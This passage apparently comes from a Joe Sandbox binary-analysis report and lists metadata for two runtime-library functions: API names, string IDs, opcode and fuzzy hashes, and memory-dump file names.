                    • API ID: EnvironmentExpandStrings
                    • String ID: Me+c
                    • API String ID: 237503144-2767035324
                    • Opcode ID: eb193326d453e83d9ebdb244f25b4325be34616b70f772f27f2900c8711ee442
                    • Instruction ID: 6a952149dbdefd7adcfa807e745435323940f2957002527407d1785426e0cb95
                    • Opcode Fuzzy Hash: eb193326d453e83d9ebdb244f25b4325be34616b70f772f27f2900c8711ee442
                    • Instruction Fuzzy Hash: C0513FB0109345AFD315CF14D880B5BBBE6ABC6358F108A2CF8A95B295D770EA44CB92
                    Function 0040E84B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409EA6: __getptd.LIBCMT ref: 00409EAC
                      • Part of subcall function 00409EA6: __getptd.LIBCMT ref: 00409EBC
                    • __getptd.LIBCMT ref: 0040E85A
                      • Part of subcall function 0040AD41: __amsg_exit.LIBCMT ref: 0040AD51
                    • __getptd.LIBCMT ref: 0040E868
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit
                    • String ID: csm
                    • API String ID: 1969926928-1018135373
                    • Opcode ID: 19a090d337b5289cb2aa2f64d74c49aadee50cee4b888bae0250ae30ba76a082
                    • Instruction ID: 3b303892935f73c44e077245793f5a2bb743f8050405bfdb766377c7a62ed6ea
                    • Opcode Fuzzy Hash: 19a090d337b5289cb2aa2f64d74c49aadee50cee4b888bae0250ae30ba76a082
                    • Instruction Fuzzy Hash: A9011636800204DACF24AE63C440AAEB7B5AF11315F188C3FE4416B7D1CB399AA88A49